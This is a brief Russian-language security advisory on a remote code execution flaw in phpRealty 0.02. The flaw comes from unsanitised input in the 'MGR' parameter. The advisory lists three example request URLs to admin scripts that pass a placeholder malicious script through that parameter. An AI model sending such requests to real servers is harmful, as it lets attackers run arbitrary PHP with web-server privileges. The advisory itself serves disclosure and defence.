Программа: phpRealty 0.02

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «MGR» различными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://localhost/[ Path ]/manager/admin/index.php?MGR=[evilscript]
http://localhost/[ Path ]/manager/admin/p_ins.php?MGR=[evilscript]
http://localhost/[ Path ]/manager/admin/u_ins.php?MGR=[evilscript]
 



Оставить мнение